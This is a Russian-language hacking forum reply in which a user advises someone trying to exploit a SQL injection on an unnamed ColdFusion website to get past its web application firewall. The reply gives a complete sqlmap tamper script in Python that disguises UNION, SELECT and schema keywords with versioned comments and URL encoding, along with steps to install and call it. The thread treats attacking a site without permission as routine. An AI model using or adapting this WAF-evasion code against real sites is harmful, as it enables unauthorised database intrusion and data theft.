Показать сообщение отдельно

  #8  
Старый 11.08.2019, 13:54
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от highmoore  

Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь

Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример

.SpoilerTarget" type="button">Spoiler
#!/usr/bin/env python

"""

Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)

See the file 'doc/COPYING' for copying permission

"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():

pass

def tamper(payload, **kwargs):

"""

........

"""

if payload:

payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")

payload = payload.replace("table_schema", "/*!12345%74able_schema*/")

payload = payload.replace("table_name", "/*!12345%74able_name*/")

payload = payload.replace("UNION", "/*!12345%75NION*/")

payload = payload.replace("SELECT", "/*!12345%73ELECT*/")

payload = payload.replace("SCHEMA", "%73CHEMA")

payload = payload.replace("schema", "%73chema")

payload = payload.replace("from", "/*!12345from*/")

return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
 
Ответить с цитированием